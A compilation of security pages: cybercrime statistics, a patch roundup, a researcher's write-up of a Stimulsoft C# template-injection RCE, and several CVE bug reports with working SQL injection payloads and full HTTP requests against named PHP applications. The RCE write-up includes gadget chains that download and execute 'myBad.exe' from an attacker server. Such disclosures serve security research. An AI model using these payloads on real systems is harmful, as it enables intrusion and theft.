When looking at the scale and scope of worldwide cybercrime, password attacks are the most commonly observed type of threat in a given 60-second period.

Cybercrime is big and still growing bigger. It is often difficult to fully grasp the impact online attacks have had over the past decades. We used data from various Microsoft-owned properties and a mix of external sources to illustrate the scale and scope of worldwide cybercrime. Our comprehensive report on malicious activity highlights what is happening around the world within any given 60-second window.

**Cyberattacks Vary By Type and Focus**

If we’ve learned anything from our examination of last year’s online attacks, it’s that security teams need to be prepared to defend against a wide variety of threats at all times. According to RiskIQ, acquired by Microsoft in 2021, password attacks were far and away the most commonly observed type of threat, clocking in at 34,740 per minute. However, we also saw 1,902 Internet of Things (IoT) attacks and 1,095 distributed denial-of-service (DDoS) attacks during the same 60-second time period.

The threat picture gets even more complex the deeper we dive into internal Microsoft security data. We most commonly blocked email threats, identity threats, and brute-force authorization attacks for our customers.

When we examined a broad range of market data, we uncovered even more attacks. In 2021, seven phishing attacks occurred every minute, one SQL injection attack every two minutes, one new threat infrastructure detection every 35 minutes, one supply chain attack every 44 minutes, and one ransomware attack every 195 minutes. All of this comes together to create a tangled cybercrime landscape that security teams have to contend with.

**What Is the True Cost of Cybercrime?**

Cybercrime is a highly disruptive force, estimated to cause trillions of dollars in damages globally every year. The cost of cybercrime comes from damage done to data and property, stolen assets — including intellectual property — and the disruption of business systems and productivity.

Here’s a breakdown of how much cybercriminals cost businesses and consumers in 2021 per minute:

*   Worldwide economic impact of cybercrime: $1,141,553

*   Global cybersecurity spend: $285,388

*   E-commerce payment fraud losses: $38,052

*   Global ransomware damages: $38,051

*   Total cost of business email compromise: $4,566

*   Amount lost to cryptocurrency scams: $3,615

*   Average cost of breach: $8

*   Average cost of malware attacks: $5

How should enterprises guard against the disruptions and financial losses that come with a cybersecurity breach? They should start by understanding the full scope of the digital landscape that needs to be protected.

**What Should Organizations Expect?**

Threat actors are getting savvier about the tools and methods they use for evading detection, bypassing security systems, and perpetrating attacks. In 2021 there were 79,861 new hosts and 7,620 new IoT devices every minute. Likewise, we discovered 150 new domains, 53 new active LetsEncrypt SSL certificates, and 23 new mobile apps created in the same time period. Each of these additions can potentially act as a doorway for threat actors.

Cloud migrations, new digital initiatives, and shadow IT all widen the attack surface. At the enterprise level, that can mean a vast estate spanning multiple clouds and massively complex ecosystems. Meanwhile, cheap infrastructure and flourishing cybercrime economies grow the threat landscape that organizations, in turn, must track. Organizations need to ensure they’re one step ahead by creating a more holistic cybersecurity strategy that protects their operations on all fronts.

To gain control of this dynamic threat landscape, security teams must keep a pulse on new and emerging threats, the latest cybercrime tactics, and the leading tools at their disposal. Microsoft tracks more than 43 trillion signals every day to develop dynamic, hyper-relevant threat intelligence that evolves with the attack surface and helps us to detect and respond to threats rapidly. Our customers can access this intelligence directly to create a deep and unique view of the threat landscape, a 360-degree understanding of their exposure to it, and tools to mitigate and respond.

A Cyber Threat Minute: Cybercrime’s Scope in 60-Second Snapshots

Plus: Important patches from Apple, VMWare, Cisco, Zimbra, SAP, and Oracle.

Other issues fixed in October are a heap buffer overflow in WebSQL tracked as CVE-2022-3446 and a use-after-free bug in Permissions API tracked as CVE-2022-3448, Google wrote in its blog. Google also fixed two use-after-free bugs in Safe Browsing and in Peer Connection.

Google Android

The Android Security Bulletin for October includes fixes for 15 flaws in the Framework and System and 33 issues in the kernel and vendor components. One of the most concerning issues is a critical security vulnerability in the Framework component that could lead to local escalation of privilege, tracked as CVE-2022-20419. Meanwhile, a flaw in the Kernel could also lead to local escalation of privilege with no additional execution privileges needed.

None of the issues are known to have been used in attacks, but it still makes sense to check your device and update it when you can. Google has issued the update to its Pixel devices and it’s also available for the Samsung Galaxy S21 and S22 series smartphones and Galaxy S21 FE.

Cisco

Cisco has urged companies to patch two flaws in its AnyConnect Secure Mobility Client for Windows after it was confirmed the vulnerabilities are being used in attacks. Tracked as CVE-2020-3433, the first could allow an attacker with valid credentials on Windows to execute code on the affected machine with system privileges.

Meanwhile, CVE-2020-3153 could allow an attacker with valid Windows credentials to copy malicious files to arbitrary locations with system-level privileges.

The US Cybersecurity and Infrastructure Security Agency has added the Cisco flaws to its already exploited vulnerabilities catalog.

While both the Cisco flaws require the attacker to be authenticated, it’s still important to update now.

Zoom

Video conferencing service Zoom patched several issues in October, including a flaw in its Zoom client for meetings, which is marked as having a high severity with a CVSS Score of 8.8. Zoom says versions before version 5.12.2 are susceptible to a URL-parsing vulnerability tracked as CVE-2022-28763.

“If a malicious Zoom meeting URL is opened, the link may direct the user to connect to an arbitrary network address, leading to additional attacks including session takeovers,” Zoom said in a security bulletin.

Earlier in the month, Zoom alerted users that its client for meetings for macOS starting with 5.10.6 and prior to 5.12.0 contained a debugging port misconfiguration.

VMWare

Software giant VMWare has patched a serious vulnerability in its Cloud Foundation

Tracked as CVE-2021-39144. The remote code execution vulnerability via XStream open source library is rated as having a critical severity with a maximum CVSSv3 base score of 9.8. “Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation, a malicious actor can get remote code execution in the context of 'root' on the appliance,” VMWare said in an advisory.

The VMware Cloud Foundation update also addresses an XML External Entity vulnerability with a lesser CVSSv3 base score of 5.3. Tracked as CVE-2022-31678, the bug could allow an unauthenticated user to perform denial of service.

Zimbra

Software firm Zimbra has issued patches to fix an already-exploited code execution flaw that could allow an attacker to access user accounts. The issue, tracked as CVE-2022-41352, has a CVSS severity score of 9.8.

Exploitation was spotted by Rapid7 researchers, who identified signs it had been used in attacks. Zimbra initially released a workaround to fix it, but now the patch is available, you should apply it ASAP.

SAP

Enterprise software firm SAP has published 23 new and updated Security Notes in its October Patch Day. Among the most serious issues is a critical Path Traversal vulnerability in SAP Manufacturing Execution. The vulnerability affects two plugins: Work Instruction Viewer and Visual Test and Repair and has a CVSS score of 9.9.

Another issue with a CVSS score of 9.6 is an account hijacking vulnerability in the SAP Commerce login page.

Oracle

Software giant Oracle has released a whopping 370 patches as part of its quarterly security update. Oracle’s Critical Patch Update for October fixes 50 vulnerabilities rated as critical.

The update contains 37 new security patches for Oracle MySQL, 11 of which may be remotely exploitable without authentication. It also contains 24 new security patches for Oracle Financial Services Applications, 16 of which may be remotely exploitable without authentication.

Due to “the threat posed by a successful attack,” Oracle “strongly recommends” that customers apply Critical Patch Update security patches as soon as possible.

You Need to Update Google Chrome, Windows, and Zoom Right Now

Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0, when Compilation Mode is used, allows an attacker to execute arbitrary C# code on any machine that renders a report, including the application server or a user's local machine, as demonstrated by System.Diagnostics.Process.Start.

Similar to CVE-2020-15865. However, this one was a little trickier because I could only execute chained C# commands that ultimately return an Object. This is a technique that can be used anywhere where user input is compiled by design, such as in template injection. In fact, hackers I've shared this story with had success using the concept across different languages and systems.

**Information Disclosure to RCE** 

This started with a low severity issue - a verbose error message from the application when I typed SQL junk into the Report Editor, looking for a SQL injection. The errors contained CS1503 (C# compilation errors) returned from Stimulsoft Reports 2013.1.1600.0, so I was confident there was an RCE available: 

So, after trying a few C# commands, I eventually I got errors like:

 C:\\User\\burninator\\AppData\\Local\\Temp\\klqskh4k.0.cs(578,74): error CS1502: The best overloaded method match for '\*\*\*\*.ToString(object,object,bool)' has some invalid arguments: error CS1503: Argument 2: cannot convert from method group' to 'object' 

Bingo! I love to hear that something is being converted, and in a function we apparently have control over. This error is a wonderful window into how this works. I can tell from the error that it will only compile and execute successfully if we give it something that it can interpret as an Object. I tested this by sending {new Object()}, and it compiled without error! These work too but they're not that helpful (yet): 

{new System.Diagnostics.Process()}

{System.Math.Ceiling} 

{new System.Diagnostics.StackTrace(true).GetFrame(1).GetMethod()}

So, how can I weaponize this? Since this is a local thick client application, the first step is to figure out if it's going to execute these commands locally or on the application web server it's connected to. Surprise! It actually does both, since I was able to chain this with other functionality to make it launch server side AND locally. But first let's find proof that we can inject a malicious command... 

To find out, I read the manual. I actually READ the manual for the C# language. I know, I know. Disgusting. It's a taboo I didn't even do and would never have done when I was a developer. But it was important here, because I needed to find attack chains that would let me: 

1.)  execute a command on the local machine (pop calc.exe) 

2.) execute a command locally to make the remote server do an external DNS hit POC and then make it download/write/execute the file  

It reminded me a lot of Object Deserialization gadget/widget chains in YsoSerial, which are well known internal commands or system objects that aid with command injection and execution (i.e.http://gursevkalra.blogspot.com/2016/01/ysoserial-commonscollections1-exploit.html ). But given my constraints, I had to create my own. If you aren't familiar with Objects in Object Oriented Programming languages, here's a quick rundown from my presentation on Object Attacks and how I used them in this context. The class definitions are from the C# manual:

 

{System.IO.File.ReadAllText(@"dontlook.txt")} 

(NOTE: the curly brackets are for the templating system, they're not valid C#)  

 

{System.Net.WebRequest.Create("https://ATTACKSERVER:8000/myBad.exe").GetResponse().GetResponseStream()}  

 

{System.Diagnostics.Process.Start("myBad.exe")}  

That's how I got one of the weirdest shells ever.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42777  

Also, now that I've written this out, I realize that by far the least fun part of this exploit was reading the C# manual to find interesting File IO and Networking gadget chains that return Objects... it was a lot of 2am nights. So I think I will end up automating that process, if something like it doesn't already exist.

CVE-2021-42777: Reporting Library RCE (Object Chaining) - CVE-2021-42777

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 21 and Oct. 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 21 to October 28

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*# Canteen Management System v1.0 by mayuri\_k has SQL injection

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchOrderData.php

Vulnerability location: /youthappam/php\_action/fetchOrderData.php, userid

dbname =youthappam,length=10

\[+\] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place ---> userid

POST /youthappam/php\_action/fetchOrderData.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

 \*\*

CVE-2022-43232: bug_report/SQLi-2.md at main · HKD01l/bug_report

Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /clearance/clearance.php.

Permalink

**Barangay Management System v1.0 by itsourcecode.com has SQL injection**

BUG\_Author: QiaoRui feng

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Vulnerability File: /bmis/pages/clearance/clearance.php

Vulnerability location: /bmis/pages/clearance/clearance.php,hidden\_id

\[+\] Payload: hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> hidden\_id

POST /bmis/pages/clearance/clearance.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/clearance/clearance.php
Cookie: sessions=aj0k5o11d743ingah9kp1b0ejntrqer6; PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&txt\_edit\_cnum=1&txt\_edit\_findings=1&txt\_edit\_purpose=1&txt\_edit\_ornum=1&txt\_edit\_amount=1&btn\_save=Save&table\_length=10&table1\_length=10

CVE-2022-43228: bug_report/SQLi-1.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchSelectedUser.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedUser.php

Vulnerability location: /youthappam/php\_action/fetchSelectedUser.php, userid

dbname =youthappam,length=10

\[+\] Payload: userid=-1 union select 1,database(),3,4 // Leak place ---> userid

POST /youthappam/php\_action/fetchSelectedUser.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
userid=-1 union select 1,database(),3,4

CVE-2022-43233: bug_report/SQLi-1.md at main · HKD01l/bug_report

Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=bookings/view_details.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: QiaoRui feng

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/?page=bookings/view\_details&id=

Vulnerability location: /csms/admin/?page=bookings/view\_details&id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/?page=bookings/view\_details&id=-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /csms/admin/?page\=bookings/view\_details&id\=\-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

CVE-2022-43230: bug_report/SQLi-1.md at main · HKD01l/bug_report

Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /bookings/update_status.php.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: QiaoRui feng

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/bookings/update\_status.php?id=

Vulnerability location: /csms/admin/bookings/update\_status.php?id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/bookings/update\_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /csms/admin/bookings/update\_status.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

CVE-2022-43229: bug_report/SQLi-2.md at main · HKD01l/bug_report

Auth. SQL Injection (SQLi) vulnerability in Quiz And Survey Master plugin <= 7.3.4 on WordPress.

 Verified

 Fixed

**9.1**

CVSS 3.1 score Critical severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 7.3.4

PSID 

481aa95e019b

Classification 

SQL Injection

OWASP Top 10 

A1: Injection

Required privilege 

Requires high role user authentication.

Publicly disclosed

2022-10-21

**Details**

Auth. SQL Injection (SQLi) vulnerability discovered by Vlad Vector (Patchstack) in WordPress Quiz And Survey Master plugin (versions <= 7.3.4).

**Solution**

Update the WordPress Quiz And Survey Master plugin to the latest available version (at least 7.3.5).

**References**

Tag

#sql